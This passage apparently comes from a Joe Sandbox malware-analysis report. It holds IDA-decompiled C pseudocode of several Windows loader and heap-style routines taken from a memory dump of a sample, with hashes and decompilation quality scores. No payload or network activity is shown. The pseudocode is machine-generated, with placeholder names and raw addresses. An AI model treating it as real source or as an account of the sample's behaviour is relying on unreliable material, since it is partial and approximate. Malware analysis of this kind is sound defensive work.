                    				signed int _t215;
                    				signed int _t218;
                    				void* _t221;
                    				signed int _t224;
                    				signed int _t226;
                    				intOrPtr _t228;
                    				signed int _t232;
                    				signed int _t233;
                    				signed int _t234;
                    				void* _t237;
                    				void* _t238;
                    
                    				_t236 = __esi;
                    				_t235 = __edi;
                    				_t193 = __ebx;
                    				_push(0x70);
                    				_push(0x173f9c0);
                    				E016BD0E8(__ebx, __edi, __esi);
                    				 *((intOrPtr*)(_t237 - 0x5c)) = __ecx;
                    				if( *0x1757b04 == 0) {
                    					L4:
                    					goto L5;
                    				} else {
                    					_t136 = E0167CEE4( *((intOrPtr*)(__ecx + 0x18)), 1, 9, _t237 - 0x58, _t237 - 0x54);
                    					_t236 = 0;
                    					if(_t136 < 0) {
                    						 *((intOrPtr*)(_t237 - 0x54)) = 0;
                    					}
                    					if( *((intOrPtr*)(_t237 - 0x54)) != 0) {
                    						_t193 =  *( *[fs:0x30] + 0x18);
                    						 *(_t237 - 0x48) =  *( *[fs:0x30] + 0x18);
                    						 *(_t237 - 0x68) = _t236;
                    						 *(_t237 - 0x6c) = _t236;
                    						_t235 = _t236;
                    						 *(_t237 - 0x60) = _t236;
                    						E01682280( *[fs:0x30], 0x1758550);
                    						_t139 =  *0x1757b04; // 0x1
                    						__eflags = _t139 - 1;
                    						if(__eflags != 0) {
                    							_t200 = 0xc;
                    							_t201 = _t237 - 0x40;
                    							_t141 = E0169F3D5(_t201, _t139 * _t200, _t139 * _t200 >> 0x20);
                    							 *(_t237 - 0x44) = _t141;
                    							__eflags = _t141;
                    							if(_t141 < 0) {
                    								L50:
                    								E0167FFB0(_t193, _t235, 0x1758550);
                    								L5:
                    								return E016BD130(_t193, _t235, _t236);
                    							}
                    							_push(_t201);
                    							_t221 = 0x10;
                    							_t202 =  *(_t237 - 0x40);
                    							_t145 = E01661C45( *(_t237 - 0x40), _t221);
                    							 *(_t237 - 0x44) = _t145;
                    							__eflags = _t145;
                    							if(_t145 < 0) {
                    								goto L50;
                    							}
                    							_t146 =  *0x1757b9c; // 0x0
                    							_t235 = L01684620(_t202, _t193, _t146 + 0xc0000,  *(_t237 - 0x40));
                    							 *(_t237 - 0x60) = _t235;
                    							__eflags = _t235;
                    							if(_t235 == 0) {
                    								_t149 = 0xc0000017;
                    								 *(_t237 - 0x44) = 0xc0000017;
                    							} else {
                    								_t149 =  *(_t237 - 0x44);
                    							}
                    							__eflags = _t149;
                    							if(__eflags >= 0) {
                    								L8:
                    								 *(_t237 - 0x64) = _t235;
                    								_t150 =  *0x1757b10; // 0x0
                    								 *(_t237 - 0x4c) = _t150;
                    								_push(_t237 - 0x74);
                    								_push(_t237 - 0x39);
                    								_push(_t237 - 0x58);
                    								_t193 = E0169A61C(_t193,  *((intOrPtr*)(_t237 - 0x54)),  *((intOrPtr*)(_t237 - 0x5c)), _t235, _t236, __eflags);
                    								 *(_t237 - 0x44) = _t193;
                    								__eflags = _t193;
                    								if(_t193 < 0) {
                    									L30:
                    									E0167FFB0(_t193, _t235, 0x1758550);
                    									__eflags = _t235 - _t237 - 0x38;
                    									if(_t235 != _t237 - 0x38) {
                    										_t235 =  *(_t237 - 0x48);
                    										L016877F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x48));
                    									} else {
                    										_t235 =  *(_t237 - 0x48);
                    									}
                    									__eflags =  *(_t237 - 0x6c);
                    									if( *(_t237 - 0x6c) != 0) {
                    										L016877F0(_t235, _t236,  *(_t237 - 0x6c));
                    									}
                    									__eflags = _t193;
                    									if(_t193 >= 0) {
                    										goto L4;
                    									} else {
                    										goto L5;
                    									}
                    								}
                    								_t204 =  *0x1757b04; // 0x1
                    								 *(_t235 + 8) = _t204;
                    								__eflags =  *((char*)(_t237 - 0x39));
                    								if( *((char*)(_t237 - 0x39)) != 0) {
                    									 *(_t235 + 4) = 1;
                    									 *(_t235 + 0xc) =  *(_t237 - 0x4c);
                    									_t161 =  *0x1757b10; // 0x0
                    									 *(_t237 - 0x4c) = _t161;
                    								} else {
                    									 *(_t235 + 4) = _t236;
                    									 *(_t235 + 0xc) =  *(_t237 - 0x58);
                    								}
                    								 *((intOrPtr*)(_t237 - 0x54)) = E016A37C5( *((intOrPtr*)(_t237 - 0x74)), _t237 - 0x70);
                    								_t224 = _t236;
                    								 *(_t237 - 0x40) = _t236;
                    								 *(_t237 - 0x50) = _t236;
                    								while(1) {
                    									_t163 =  *(_t235 + 8);
                    									__eflags = _t224 - _t163;
                    									if(_t224 >= _t163) {
                    										break;
                    									}
                    									_t228 =  *0x1757b9c; // 0x0
                    									_t214 = L01684620( *((intOrPtr*)(_t237 - 0x54)) + 1,  *(_t237 - 0x48), _t228 + 0xc0000,  *(_t237 - 0x70) +  *((intOrPtr*)(_t237 - 0x54)) + 1);
                    									 *(_t237 - 0x78) = _t214;
                    									__eflags = _t214;
                    									if(_t214 == 0) {
                    										L52:
                    										_t193 = 0xc0000017;
                    										L19:
                    										 *(_t237 - 0x44) = _t193;
                    										L20:
                    										_t206 =  *(_t237 - 0x40);
                    										__eflags = _t206;
                    										if(_t206 == 0) {
                    											L26:
                    											__eflags = _t193;
                    											if(_t193 < 0) {
                    												E016A37F5( *((intOrPtr*)(_t237 - 0x5c)), _t237 - 0x6c);
                    												__eflags =  *((char*)(_t237 - 0x39));
                    												if( *((char*)(_t237 - 0x39)) != 0) {
                    													 *0x1757b10 =  *0x1757b10 - 8;
                    												}
                    											} else {
                    												_t169 =  *(_t237 - 0x68);
                    												__eflags = _t169;
                    												if(_t169 != 0) {
                    													 *0x1757b04 =  *0x1757b04 - _t169;
                    												}
                    											}
                    											__eflags = _t193;
                    											if(_t193 >= 0) {
                    												 *((short*)( *((intOrPtr*)(_t237 - 0x5c)) + 0x3a)) = 0xffff;
                    											}
                    											goto L30;
                    										}
                    										_t226 = _t206 * 0xc;
                    										__eflags = _t226;
                    										_t194 =  *(_t237 - 0x48);
                    										do {
                    											 *(_t237 - 0x40) = _t206 - 1;
                    											_t226 = _t226 - 0xc;
                    											 *(_t237 - 0x4c) = _t226;
                    											__eflags =  *(_t235 + _t226 + 0x10) & 0x00000002;
                    											if(( *(_t235 + _t226 + 0x10) & 0x00000002) == 0) {
                    												__eflags =  *(_t235 + _t226 + 0x10) & 0x00000001;
                    												if(( *(_t235 + _t226 + 0x10) & 0x00000001) == 0) {
                    													 *(_t237 - 0x68) =  *(_t237 - 0x68) + 1;
                    													_t210 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
                    													__eflags =  *((char*)(_t237 - 0x39));
                    													if( *((char*)(_t237 - 0x39)) == 0) {
                    														_t171 = _t210;
                    													} else {
                    														 *(_t237 - 0x50) =  *(_t210 +  *(_t237 - 0x58) * 4);
                    														L016877F0(_t194, _t236, _t210 - 8);
                    														_t171 =  *(_t237 - 0x50);
                    													}
                    													L48:
                    													L016877F0(_t194, _t236,  *((intOrPtr*)(_t171 - 4)));
                    													L46:
                    													_t206 =  *(_t237 - 0x40);
                    													_t226 =  *(_t237 - 0x4c);
                    													goto L24;
                    												}
                    												 *0x1757b08 =  *0x1757b08 + 1;
                    												goto L24;
                    											}
                    											_t171 =  *(_t226 +  *(_t237 - 0x64) + 0x14);
                    											__eflags = _t171;
                    											if(_t171 != 0) {
                    												__eflags =  *((char*)(_t237 - 0x39));
                    												if( *((char*)(_t237 - 0x39)) == 0) {
                    													goto L48;
                    												}
                    												E016A57C2(_t171,  *((intOrPtr*)(_t235 + _t226 + 0x18)));
                    												goto L46;
                    											}
                    											L24:
                    											__eflags = _t206;
                    										} while (_t206 != 0);
                    										_t193 =  *(_t237 - 0x44);
                    										goto L26;
                    									}
                    									_t232 =  *(_t237 - 0x70) + 0x00000001 + _t214 &  !( *(_t237 - 0x70));
                    									 *(_t237 - 0x7c) = _t232;
                    									 *(_t232 - 4) = _t214;
                    									 *(_t237 - 4) = _t236;
                    									E016AF3E0(_t232,  *((intOrPtr*)( *((intOrPtr*)(_t237 - 0x74)) + 8)),  *((intOrPtr*)(_t237 - 0x54)));
                    									_t238 = _t238 + 0xc;
                    									 *(_t237 - 4) = 0xfffffffe;
                    									_t215 =  *(_t237 - 0x48);
                    									__eflags = _t193;
                    									if(_t193 < 0) {
                    										L016877F0(_t215, _t236,  *(_t237 - 0x78));
                    										goto L20;
                    									}
                    									__eflags =  *((char*)(_t237 - 0x39));
                    									if( *((char*)(_t237 - 0x39)) != 0) {
                    										_t233 = E0169A44B( *(_t237 - 0x4c));
                    										 *(_t237 - 0x50) = _t233;
                    										__eflags = _t233;
                    										if(_t233 == 0) {
                    											L016877F0( *(_t237 - 0x48), _t236,  *(_t237 - 0x78));
                    											goto L52;
                    										}
                    										 *(_t233 +  *(_t237 - 0x58) * 4) =  *(_t237 - 0x7c);
                    										L17:
                    										_t234 =  *(_t237 - 0x40);
                    										_t218 = _t234 * 0xc;
                    										 *(_t218 +  *(_t237 - 0x64) + 0x14) =  *(_t237 - 0x50);
                    										 *(_t218 + _t235 + 0x10) = _t236;
                    										_t224 = _t234 + 1;
                    										 *(_t237 - 0x40) = _t224;
                    										 *(_t237 - 0x50) = _t224;
                    										_t193 =  *(_t237 - 0x44);
                    										continue;
                    									}
                    									 *(_t237 - 0x50) =  *(_t237 - 0x7c);
                    									goto L17;
                    								}
                    								 *_t235 = _t236;
                    								_t165 = 0x10 + _t163 * 0xc;
                    								__eflags = _t165;
                    								_push(_t165);
                    								_push(_t235);
                    								_push(0x23);
                    								_push(0xffffffff);
                    								_t193 = E016A96C0();
                    								goto L19;
                    							} else {
                    								goto L50;
                    							}
                    						}
                    						_t235 = _t237 - 0x38;
                    						 *(_t237 - 0x60) = _t235;
                    						goto L8;
                    					}
                    					goto L4;
                    				}
                    			}

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 1b1a9e8397539689cb4232f8ceab6c9da942b032757961b2bf06cb5a5ca019d5
                    • Instruction ID: 84ca6cc01a8d90117ad67119fe8d11b05beb941d9499198e7429ff1582f4b237
                    • Opcode Fuzzy Hash: 1b1a9e8397539689cb4232f8ceab6c9da942b032757961b2bf06cb5a5ca019d5
                    • Instruction Fuzzy Hash: D4B12870E00219EBDB19DFA9CD84AAEBBBABF48704F10412DE515AB345D770AD42CB90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 67%
                    			E0169513A(intOrPtr __ecx, void* __edx) {
                    				signed int _v8;
                    				signed char _v16;
                    				intOrPtr _v20;
                    				intOrPtr _v24;
                    				char _v28;
                    				signed int _v32;
                    				signed int _v36;
                    				signed int _v40;
                    				intOrPtr _v44;
                    				intOrPtr _v48;
                    				char _v63;
                    				char _v64;
                    				signed int _v72;
                    				signed int _v76;
                    				signed int _v80;
                    				signed int _v84;
                    				signed int _v88;
                    				signed char* _v92;
                    				signed int _v100;
                    				signed int _v104;
                    				char _v105;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				void* _t157;
                    				signed int _t159;
                    				signed int _t160;
                    				unsigned int* _t161;
                    				intOrPtr _t165;
                    				signed int _t172;
                    				signed char* _t181;
                    				intOrPtr _t189;
                    				intOrPtr* _t200;
                    				signed int _t202;
                    				signed int _t203;
                    				char _t204;
                    				signed int _t207;
                    				signed int _t208;
                    				void* _t209;
                    				intOrPtr _t210;
                    				signed int _t212;
                    				signed int _t214;
                    				signed int _t221;
                    				signed int _t222;
                    				signed int _t226;
                    				intOrPtr* _t232;
                    				signed int _t233;
                    				signed int _t234;
                    				intOrPtr _t237;
                    				intOrPtr _t238;
                    				intOrPtr _t240;
                    				void* _t245;
                    				signed int _t246;
                    				signed int _t247;
                    				void* _t248;
                    				void* _t251;
                    				void* _t252;
                    				signed int _t253;
                    				signed int _t255;
                    				signed int _t256;
                    
                    				_t255 = (_t253 & 0xfffffff8) - 0x6c;
                    				_v8 =  *0x175d360 ^ _t255;
                    				_v32 = _v32 & 0x00000000;
                    				_t251 = __edx;
                    				_t237 = __ecx;
                    				_t212 = 6;
                    				_t245 =  &_v84;
                    				_t207 =  *((intOrPtr*)(__ecx + 0x48));
                    				_v44 =  *((intOrPtr*)(__edx + 0xc8));
                    				_v48 = __ecx;
                    				_v36 = _t207;
                    				_t157 = memset(_t245, 0, _t212 << 2);
                    				_t256 = _t255 + 0xc;
                    				_t246 = _t245 + _t212;
                    				if(_t207 == 2) {
                    					_t247 =  *(_t237 + 0x60);
                    					_t208 =  *(_t237 + 0x64);
                    					_v63 =  *((intOrPtr*)(_t237 + 0x4c));
                    					_t159 =  *((intOrPtr*)(_t237 + 0x58));
                    					_v104 = _t159;
                    					_v76 = _t159;
                    					_t160 =  *((intOrPtr*)(_t237 + 0x5c));
                    					_v100 = _t160;
                    					_v72 = _t160;
                    					L19:
                    					_v80 = _t208;
                    					_v84 = _t247;
                    					L8:
                    					_t214 = 0;
                    					if( *(_t237 + 0x74) > 0) {
                    						_t82 = _t237 + 0x84; // 0x124
                    						_t161 = _t82;
                    						_v92 = _t161;
                    						while( *_t161 >> 0x1f != 0) {
                    							_t200 = _v92;
                    							if( *_t200 == 0x80000000) {
                    								break;
                    							}
                    							_t214 = _t214 + 1;
                    							_t161 = _t200 + 0x10;
                    							_v92 = _t161;
                    							if(_t214 <  *(_t237 + 0x74)) {
                    								continue;
                    							}
                    							goto L9;
                    						}
                    						_v88 = _t214 << 4;
                    						_v40 = _t237 +  *((intOrPtr*)(_v88 + _t237 + 0x78));
                    						_t165 = 0;
                    						asm("adc eax, [ecx+edx+0x7c]");
                    						_v24 = _t165;
                    						_v28 = _v40;
                    						_v20 =  *((intOrPtr*)(_v88 + _t237 + 0x80));
                    						_t221 = _v40;
                    						_v16 =  *_v92;
                    						_v32 =  &_v28;
                    						if( *(_t237 + 0x4e) >> 0xf == 0) {
                    							goto L9;
                    						}
                    						_t240 = _v48;
                    						if( *_v92 != 0x80000000) {
                    							goto L9;
                    						}
                    						 *((intOrPtr*)(_t221 + 8)) = 0;
                    						 *((intOrPtr*)(_t221 + 0xc)) = 0;
                    						 *((intOrPtr*)(_t221 + 0x14)) = 0;
                    						 *((intOrPtr*)(_t221 + 0x10)) = _v20;
                    						_t226 = 0;
                    						_t181 = _t251 + 0x66;
                    						_v88 = 0;
                    						_v92 = _t181;
                    						do {
                    							if( *((char*)(_t181 - 2)) == 0) {
                    								goto L31;
                    							}
                    							_t226 = _v88;
                    							if(( *_t181 & 0x000000ff) == ( *(_t240 + 0x4e) & 0x7fff)) {
                    								_t181 = E016AD0F0(1, _t226 + 0x20, 0);
                    								_t226 = _v40;
                    								 *(_t226 + 8) = _t181;
                    								 *((intOrPtr*)(_t226 + 0xc)) = 0;
                    								L34:
                    								if(_v44 == 0) {
                    									goto L9;
                    								}
                    								_t210 = _v44;
                    								_t127 = _t210 + 0x1c; // 0x1c
                    								_t249 = _t127;
                    								E01682280(_t181, _t127);
                    								 *(_t210 + 0x20) =  *( *[fs:0x18] + 0x24);
                    								_t185 =  *((intOrPtr*)(_t210 + 0x94));
                    								if( *((intOrPtr*)(_t210 + 0x94)) != 0) {
                    									L016877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t185);
                    								}
                    								_t189 = L01684620(_t226,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v20 + 0x10);
                    								 *((intOrPtr*)(_t210 + 0x94)) = _t189;
                    								if(_t189 != 0) {
                    									 *((intOrPtr*)(_t189 + 8)) = _v20;
                    									 *( *((intOrPtr*)(_t210 + 0x94)) + 0xc) = _v16;
                    									_t232 =  *((intOrPtr*)(_t210 + 0x94));
                    									 *_t232 = _t232 + 0x10;
                    									 *(_t232 + 4) =  *(_t232 + 4) & 0x00000000;
                    									E016AF3E0( *((intOrPtr*)( *((intOrPtr*)(_t210 + 0x94)))), _v28, _v20);
                    									_t256 = _t256 + 0xc;
                    								}
                    								 *(_t210 + 0x20) =  *(_t210 + 0x20) & 0x00000000;
                    								E0167FFB0(_t210, _t249, _t249);
                    								_t222 = _v76;
                    								_t172 = _v80;
                    								_t208 = _v84;
                    								_t247 = _v88;
                    								L10:
                    								_t238 =  *((intOrPtr*)(_t251 + 0x1c));
                    								_v44 = _t238;
                    								if(_t238 != 0) {
                    									 *0x175b1e0(_v48 + 0x38, _v36, _v63, _t172, _t222, _t247, _t208, _v32,  *((intOrPtr*)(_t251 + 0x20)));
                    									_v44();
                    								}
                    								_pop(_t248);
                    								_pop(_t252);
                    								_pop(_t209);
                    								return E016AB640(0, _t209, _v8 ^ _t256, _t238, _t248, _t252);
                    							}
                    							_t181 = _v92;
                    							L31:
                    							_t226 = _t226 + 1;
                    							_t181 =  &(_t181[0x18]);
                    							_v88 = _t226;
                    							_v92 = _t181;
                    						} while (_t226 < 4);
                    						goto L34;
                    					}
                    					L9:
                    					_t172 = _v104;
                    					_t222 = _v100;
                    					goto L10;
                    				}
                    				_t247 = _t246 | 0xffffffff;
                    				_t208 = _t247;
                    				_v84 = _t247;
                    				_v80 = _t208;
                    				if( *((intOrPtr*)(_t251 + 0x4c)) == _t157) {
                    					_t233 = _v72;
                    					_v105 = _v64;
                    					_t202 = _v76;
                    				} else {
                    					_t204 =  *((intOrPtr*)(_t251 + 0x4d));
                    					_v105 = 1;
                    					if(_v63 <= _t204) {
                    						_v63 = _t204;
                    					}
                    					_t202 = _v76 |  *(_t251 + 0x40);
                    					_t233 = _v72 |  *(_t251 + 0x44);
                    					_t247 =  *(_t251 + 0x38);
                    					_t208 =  *(_t251 + 0x3c);
                    					_v76 = _t202;
                    					_v72 = _t233;
                    					_v84 = _t247;
                    					_v80 = _t208;
                    				}
                    				_v104 = _t202;
                    				_v100 = _t233;
                    				if( *((char*)(_t251 + 0xc4)) != 0) {
                    					_t237 = _v48;
                    					_v105 = 1;
                    					if(_v63 <=  *((intOrPtr*)(_t251 + 0xc5))) {
                    						_v63 =  *((intOrPtr*)(_t251 + 0xc5));
                    						_t237 = _v48;
                    					}
                    					_t203 = _t202 |  *(_t251 + 0xb8);
                    					_t234 = _t233 |  *(_t251 + 0xbc);
                    					_t247 = _t247 &  *(_t251 + 0xb0);
                    					_t208 = _t208 &  *(_t251 + 0xb4);
                    					_v104 = _t203;
                    					_v76 = _t203;
                    					_v100 = _t234;
                    					_v72 = _t234;
                    					_v84 = _t247;
                    					_v80 = _t208;
                    				}
                    				if(_v105 == 0) {
                    					_v36 = _v36 & 0x00000000;
                    					_t208 = 0;
                    					_t247 = 0;
                    					 *(_t237 + 0x74) =  *(_t237 + 0x74) & 0;
                    					goto L19;
                    				} else {
                    					_v36 = 1;
                    					goto L8;
                    				}
                    			}

                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: cf032abfd626239e48b6228f588d89c945d8fb44d0852c6a3ede85e2e887b5f3
                    • Instruction ID: 54e58c8cf7e4fdc5dbcb0635a4c700f2c4acbcb8fdfde94b8ce20572bad9c821
                    • Opcode Fuzzy Hash: cf032abfd626239e48b6228f588d89c945d8fb44d0852c6a3ede85e2e887b5f3
                    • Instruction Fuzzy Hash: BEC123755083818FD755CF28C980A6AFBF1BF88304F148AAEF9998B352D771E945CB42
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 74%
                    			E016903E2(signed int __ecx, signed int __edx) {
                    				signed int _v8;
                    				signed int _v12;
                    				signed int _v16;
                    				signed int _v20;
                    				signed int _v24;
                    				signed int _v28;
                    				signed int _v32;
                    				signed int _v36;
                    				intOrPtr _v40;
                    				signed int _v44;
                    				signed int _v48;
                    				char _v52;
                    				char _v56;
                    				char _v64;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				signed int _t56;
                    				signed int _t58;
                    				char* _t64;
                    				intOrPtr _t65;
                    				signed int _t74;
                    				signed int _t79;
                    				char* _t83;
                    				intOrPtr _t84;
                    				signed int _t93;
                    				signed int _t94;
                    				signed char* _t95;
                    				signed int _t99;
                    				signed int _t100;
                    				signed char* _t101;
                    				signed int _t105;
                    				signed int _t119;
                    				signed int _t120;
                    				void* _t122;
                    				signed int _t123;
                    				signed int _t127;
                    
                    				_v8 =  *0x175d360 ^ _t127;
                    				_t119 = __ecx;
                    				_t105 = __edx;
                    				_t118 = 0;
                    				_v20 = __edx;
                    				_t120 =  *(__ecx + 0x20);
                    				if(E01690548(__ecx, 0) != 0) {
                    					_t56 = 0xc000022d;
                    					L23:
                    					return E016AB640(_t56, _t105, _v8 ^ _t127, _t118, _t119, _t120);
                    				} else {
                    					_v12 = _v12 | 0xffffffff;
                    					_t58 = _t120 + 0x24;
                    					_t109 =  *(_t120 + 0x18);
                    					_t118 = _t58;
                    					_v16 = _t58;
                    					E0167B02A( *(_t120 + 0x18), _t118, 0x14a5);
                    					_v52 = 0x18;
                    					_v48 = 0;
                    					0x840 = 0x40;
                    					if( *0x1757c1c != 0) {
                    					}
                    					_v40 = 0x840;
                    					_v44 = _t105;
                    					_v36 = 0;
                    					_v32 = 0;
                    					if(E01687D50() != 0) {
                    						_t64 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                    					} else {
                    						_t64 = 0x7ffe0384;
                    					}
                    					if( *_t64 != 0) {
                    						_t65 =  *[fs:0x30];
                    						__eflags =  *(_t65 + 0x240) & 0x00000004;
                    						if(( *(_t65 + 0x240) & 0x00000004) != 0) {
                    							_t100 = E01687D50();
                    							__eflags = _t100;
                    							if(_t100 == 0) {
                    								_t101 = 0x7ffe0385;
                    							} else {
                    								_t101 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                    							}
                    							__eflags =  *_t101 & 0x00000020;
                    							if(( *_t101 & 0x00000020) != 0) {
                    								_t118 = _t118 | 0xffffffff;
                    								_t109 = 0x1485;
                    								E016E7016(0x1485, _t118, 0xffffffff, 0xffffffff, 0, 0);
                    							}
                    						}
                    					}
                    					_t105 = 0;
                    					while(1) {
                    						_push(0x60);
                    						_push(5);
                    						_push( &_v64);
                    						_push( &_v52);
                    						_push(0x100021);
                    						_push( &_v12);
                    						_t122 = E016A9830();
                    						if(_t122 >= 0) {
                    							break;
                    						}
                    						__eflags = _t122 - 0xc0000034;
                    						if(_t122 == 0xc0000034) {
                    							L38:
                    							_t120 = 0xc0000135;
                    							break;
                    						}
                    						__eflags = _t122 - 0xc000003a;
                    						if(_t122 == 0xc000003a) {
                    							goto L38;
                    						}
                    						__eflags = _t122 - 0xc0000022;
                    						if(_t122 != 0xc0000022) {
                    							break;
                    						}
                    						__eflags = _t105;
                    						if(__eflags != 0) {
                    							break;
                    						}
                    						_t109 = _t119;
                    						_t99 = E016E69A6(_t119, __eflags);
                    						__eflags = _t99;
                    						if(_t99 == 0) {
                    							break;
                    						}
                    						_t105 = _t105 + 1;
                    					}
                    					if( !_t120 >= 0) {
                    						L22:
                    						_t56 = _t120;
                    						goto L23;
                    					}
                    					if( *0x1757c04 != 0) {
                    						_t118 = _v12;
                    						_t120 = E016EA7AC(_t119, _t118, _t109);
                    						__eflags = _t120;
                    						if(_t120 >= 0) {
                    							goto L10;
                    						}
                    						__eflags =  *0x1757bd8;
                    						if( *0x1757bd8 != 0) {
                    							L20:
                    							if(_v12 != 0xffffffff) {
                    								_push(_v12);
                    								E016A95D0();
                    							}
                    							goto L22;
                    						}
                    					}
                    					L10:
                    					_push(_v12);
                    					_t105 = _t119 + 0xc;
                    					_push(0x1000000);
                    					_push(0x10);
                    					_push(0);
                    					_push(0);
                    					_push(0xf);
                    					_push(_t105);
                    					_t120 = E016A99A0();
                    					if(_t120 < 0) {
                    						__eflags = _t120 - 0xc000047e;
                    						if(_t120 == 0xc000047e) {
                    							L51:
                    							_t74 = E016E3540(_t120);
                    							_t119 = _v16;
                    							_t120 = _t74;
                    							L52:
                    							_t118 = 0x1485;
                    							E0166B1E1(_t120, 0x1485, 0, _t119);
                    							goto L20;
                    						}
                    						__eflags = _t120 - 0xc000047f;
                    						if(_t120 == 0xc000047f) {
                    							goto L51;
                    						}
                    						__eflags = _t120 - 0xc0000462;
                    						if(_t120 == 0xc0000462) {
                    							goto L51;
                    						}
                    						_t119 = _v16;
                    						__eflags = _t120 - 0xc0000017;
                    						if(_t120 != 0xc0000017) {
                    							__eflags = _t120 - 0xc000009a;
                    							if(_t120 != 0xc000009a) {
                    								__eflags = _t120 - 0xc000012d;
                    								if(_t120 != 0xc000012d) {
                    									_v28 = _t119;
                    									_push( &_v56);
                    									_push(1);
                    									_v24 = _t120;
                    									_push( &_v28);
                    									_push(1);
                    									_push(2);
                    									_push(0xc000007b);
                    									_t79 = E016AAAF0();
                    									__eflags = _t79;
                    									if(_t79 >= 0) {
                    										__eflags =  *0x1758474 - 3;
                    										if( *0x1758474 != 3) {
                    											 *0x17579dc =  *0x17579dc + 1;
                    										}
                    									}
                    								}
                    							}
                    						}
                    						goto L52;
                    					}
                    					if(E01687D50() != 0) {
                    						_t83 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                    					} else {
                    						_t83 = 0x7ffe0384;
                    					}
                    					if( *_t83 != 0) {
                    						_t84 =  *[fs:0x30];
                    						__eflags =  *(_t84 + 0x240) & 0x00000004;
                    						if(( *(_t84 + 0x240) & 0x00000004) != 0) {
                    							_t94 = E01687D50();
                    							__eflags = _t94;
                    							if(_t94 == 0) {
                    								_t95 = 0x7ffe0385;
                    							} else {
                    								_t95 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22b;
                    							}
                    							__eflags =  *_t95 & 0x00000020;
                    							if(( *_t95 & 0x00000020) != 0) {
                    								E016E7016(0x1486, _t118, 0xffffffff, 0xffffffff, 0, 0);
                    							}
                    						}
                    					}
                    					if(( *(_t119 + 0x10) & 0x00000100) == 0) {
                    						if( *0x1758708 != 0) {
                    							_t118 =  *0x7ffe0330;
                    							_t123 =  *0x1757b00; // 0x0
                    							asm("ror esi, cl");
                    							 *0x175b1e0(_v12, _v20, 0x20);
                    							_t93 =  *(_t123 ^  *0x7ffe0330)();
                    							_t50 = _t93 + 0x3ffffddb; // 0x3ffffddb
                    							asm("sbb esi, esi");
                    							_t120 =  ~_t50 & _t93;
                    						} else {
                    							_t120 = 0;
                    						}
                    					}
                    					if( !_t120 >= 0) {
                    						L19:
                    						_push( *_t105);
                    						E016A95D0();
                    						 *_t105 =  *_t105 & 0x00000000;
                    						goto L20;
                    					}
                    					_t120 = E01677F65(_t119);
                    					if( *((intOrPtr*)(_t119 + 0x60)) != 0) {
                    						__eflags = _t120;
                    						if(_t120 < 0) {
                    							goto L19;
                    						}
                    						 *(_t119 + 0x64) = _v12;
                    						goto L22;
                    					}
                    					goto L19;
                    				}
                    			}


                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 291e503c737dc89bdddd7bb51cffbeb153f54247ca13abf9d628aabf404c94df
                    • Instruction ID: c2a78570436b0e29a2b2dd0ed48d1bb7e3916bbf22d8ba4cfa5808e8affe5848
                    • Opcode Fuzzy Hash: 291e503c737dc89bdddd7bb51cffbeb153f54247ca13abf9d628aabf404c94df
                    • Instruction Fuzzy Hash: 5C911432E01215EBEF319B6CCC48BAD7BADAB04B24F150265FA11AB7D1DB749C40CB85
                    Uniqueness

                    Uniqueness Score: -1.00%

                    C-Code - Quality: 67%
                    			E0166C600(intOrPtr _a4, intOrPtr _a8, signed int _a12, signed char _a16, intOrPtr _a20, signed int _a24) {
                    				signed int _v8;
                    				char _v1036;
                    				signed int _v1040;
                    				char _v1048;
                    				signed int _v1052;
                    				signed char _v1056;
                    				void* _v1058;
                    				char _v1060;
                    				signed int _v1064;
                    				void* _v1068;
                    				intOrPtr _v1072;
                    				void* _v1084;
                    				void* __ebx;
                    				void* __edi;
                    				void* __esi;
                    				void* __ebp;
                    				intOrPtr _t70;
                    				intOrPtr _t72;
                    				signed int _t74;
                    				intOrPtr _t77;
                    				signed int _t78;
                    				signed int _t81;
                    				void* _t101;
                    				signed int _t102;
                    				signed int _t107;
                    				signed int _t109;
                    				signed int _t110;
                    				signed char _t111;
                    				signed int _t112;
                    				signed int _t113;
                    				signed int _t114;
                    				intOrPtr _t116;
                    				void* _t117;
                    				char _t118;
                    				void* _t120;
                    				char _t121;
                    				signed int _t122;
                    				signed int _t123;
                    				signed int _t125;
                    
                    				_t125 = (_t123 & 0xfffffff8) - 0x424;
                    				_v8 =  *0x175d360 ^ _t125;
                    				_t116 = _a4;
                    				_v1056 = _a16;
                    				_v1040 = _a24;
                    				if(E01676D30( &_v1048, _a8) < 0) {
                    					L4:
                    					_pop(_t117);
                    					_pop(_t120);
                    					_pop(_t101);
                    					return E016AB640(_t68, _t101, _v8 ^ _t125, _t114, _t117, _t120);
                    				}
                    				_t70 = _a20;
                    				if(_t70 >= 0x3f4) {
                    					_t121 = _t70 + 0xc;
                    					L19:
                    					_t107 =  *( *[fs:0x30] + 0x18);
                    					__eflags = _t107;
                    					if(_t107 == 0) {
                    						L60:
                    						_t68 = 0xc0000017;
                    						goto L4;
                    					}
                    					_t72 =  *0x1757b9c; // 0x0
